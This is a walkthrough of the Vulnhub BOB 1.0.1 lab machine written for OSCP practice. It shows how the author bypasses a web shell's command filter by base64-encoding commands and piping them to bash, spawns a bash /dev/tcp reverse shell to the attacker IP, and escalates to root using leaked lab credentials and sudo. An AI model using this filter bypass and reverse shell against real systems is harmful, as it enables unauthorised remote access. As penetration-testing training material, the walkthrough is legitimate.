Vulnhub: BOB 1.0.1 Walkthrough (OSCP PREP) [by dollarboysushil]
data:image/s3,"s3://crabby-images/85630/85630ececa37787e8aa2db46c027e4db0bc13d70" alt=""
Link to Vulnhub: https://www.vulnhub.com/entry/bob-101,226/
Difficulty:
Beginner/Intermediate
Goal:
Read flag from /
Hints:
Remember to look for hidden info/files
Victim IP: 192.168.1.129
Attacker IP (Kali Linux): 192.168.1.128
Reconnaissance
data:image/s3,"s3://crabby-images/97ef2/97ef2f29af50d5a605773f45f47a34b87e26f6fd" alt=""
nmap -sC -sV 192.168.1.142
-sC
for default scripts,-sV
for version enumeration
Looking at the nmap result
port 21
ftp
port 80
http
Enumeration
data:image/s3,"s3://crabby-images/8b5a7/8b5a7a7d72b7937d6614931aa31e176189f27ddc" alt=""
Visiting the port 80, we can see Milburg Highschool Website which is under construction. From here our first step would be to check robots.txt
data:image/s3,"s3://crabby-images/9ecec/9ecec9122a0c1a95bc9ac03b8d8b81d485fb1afa" alt=""
Checking the robots.txt reveals us some interesting directory.
Among them the most interesting one is /dev_shell.php
data:image/s3,"s3://crabby-images/ef4c9/ef4c95f93500a4e8413aacc0d7ee3a5155a054eb" alt=""
When visiting the dev_shell.php
we can see some kind of shell.
data:image/s3,"s3://crabby-images/6ef7b/6ef7b2f3e10f1dfdff10d088a8b53a4ed93dc630" alt=""
Running command whoami
gives us the optput www-data
data:image/s3,"s3://crabby-images/2504a/2504a565141e4996cd6e3b94c0dd65d99c319e71" alt=""
But running command ls
gives output Get out skid lol
There seems to be some kind of filter which is preventing some commands.
To bypass this, we will encode the command in base64 format and decode this string and pass into bash command
Here is an example on how we will execute the command ls
which is currently blacklisted
data:image/s3,"s3://crabby-images/d1e82/d1e82a58fb0c7c096bec8bfbaa162e541ec269f1" alt=""
https://www.base64encode.org/
First encode the command ls
into base64 format, which is bHM=
Then to run this command we will do echo bHM= | base64 -d | bash
data:image/s3,"s3://crabby-images/4863b/4863ba373dbf572e5df1b41693c250c86973a089" alt=""
echo bHM=
: This part of the command uses theecho
command to print the base64-encoded string "bHM=" to the standard output.| base64 -d
: The|
(pipe) operator takes the output from theecho
command and pipes it as input to thebase64
command with the-d
option. The-d
option instructsbase64
to decode the input.| bash
: Another pipe operator takes the decoded output and pipes it to thebash
command. This means that the decoded content is executed as a Bash command.
Looking at the result we can say, we can now run any command using this bypass method.
Initial Access
Since we have power to run any command.
Our next step would be to get interactive shell using, the reverse shell one liner. I will be using cheatsheet from here https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
data:image/s3,"s3://crabby-images/e4697/e46979924062cc8a856fa293e5c4d8553fdeca32" alt=""
I will be using Bash one liner.
bash -i >& /dev/tcp/192.168.1.128/443 0>&1
Here make sure to change ip to your attacker machine and port as you wish. I am using port 443
data:image/s3,"s3://crabby-images/eaa02/eaa024fc03376a0b4c1be8a87b9a566759ba77fe" alt=""
Encode this one liner into base64 format.
data:image/s3,"s3://crabby-images/8ada3/8ada3af1ada9e71c18cd3b1f0e461a932d3b6476" alt=""
Make netcat listner ready, use the same port you used before, 443 in my case.
In my case the encoded string isYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTI4LzQ0MyAwPiYx
Update your command as:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTI4LzQ0MyAwPiYx | base64 -d | b
And paste it into /dev_shell.php
data:image/s3,"s3://crabby-images/f6d54/f6d54c6f606c6767217802c54edb06de1010ca35" alt=""
Looking at the Netcat listner, we should have shell as user www-data
data:image/s3,"s3://crabby-images/19546/19546a2b62724805e241950277ffee51170baff3" alt=""
Run python -c ‘import pty;pty.spawn(“/bin/bash”);’
to upgrade the shell.
data:image/s3,"s3://crabby-images/47dd7/47dd78f7c8b1c8779a3eefe4d661d590defe9909" alt=""
Privelege Escalation
data:image/s3,"s3://crabby-images/82fcd/82fcd78af5faacd38306329232623a87187d901b" alt=""
At home directorty of elliot
we have theadminisdumb.txt
file.
Inside this txt file, we can get some credentials;
james:Qwerty
andelliot:theadminisdumb
data:image/s3,"s3://crabby-images/297fb/297fb99db797529b3658cc713e9434b26168d508" alt=""
While looking into different folders, under Document of bob
we can see
login.txt.gpg
and staff.txt
and folder named Secret
Lets check Secret folder first,
data:image/s3,"s3://crabby-images/10b21/10b2120124d34d45fa6090f41b302b6a18c30530" alt=""
Deep inside the Secret folder we have notes.sh
, Reading the content of notes.sh
at first didn’t make much sense.
data:image/s3,"s3://crabby-images/297fb/297fb99db797529b3658cc713e9434b26168d508" alt=""
Staff.txt
was not much of use.
But login.txt.gpg
is interesting.
After little bit of google search I found .gpg
The “.gpg” extension suggests that the file is encrypted using GPG (GNU Privacy Guard) or GnuPG. GPG is a free and open-source software that provides cryptographic privacy and authentication for data communication.
Trying to open this file asks for the decryption key, which we don’t have.
With an aim to find the decryption key, I started digging around again.
data:image/s3,"s3://crabby-images/2aad8/2aad845c21f69172b2cf34ce9bb50b909a303fb7" alt=""
Under the bob’s home directory we can see .old_passwordfile.html
wich contains credentails of jc
and seb
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
We know there exis user jc, so I tried to switch user to jc
data:image/s3,"s3://crabby-images/7feb3/7feb32e0b215d78aadbad4a743316d0f2e8c2917" alt=""
My quest of finding the decryption key hit the wall. After some time I revisited the files I found earlier..
data:image/s3,"s3://crabby-images/ac460/ac460a047be68f6d344c9326c8b29c6c9b43f3a7" alt=""
If we look at the notes.sh
file and read out the first/capital words from each lines then it forms. HARPOCRATES
data:image/s3,"s3://crabby-images/90e62/90e62e1061bded6a44aac407fdbcd8ecacff7a49" alt=""
With simple google search we can assume this can be the decryption key.
data:image/s3,"s3://crabby-images/99669/996698d71736f59350a85c773a3f29a2f3d0a854" alt=""
And using this string as passphrase we were able to decrypt the file.
we have credentials bob:b0bcat_
data:image/s3,"s3://crabby-images/4fc04/4fc04311c8f98f2ae4a2fc5d9e26a81b5480b394" alt=""
Then switching user to bob and using command sudo -l
reveals we can use run all command as sudo.
With this power lets spawn a bash shell.
data:image/s3,"s3://crabby-images/a66dc/a66dc614e55aa72e14eee7ab0f8aa80acaa5489d" alt=""
And we can read the flag.txt
which completes the machine.
For any correction / query /suggestion contact on
Instagram dollarboysushil
Twitter (X) dollarboysushil
Youtube dollarboysushil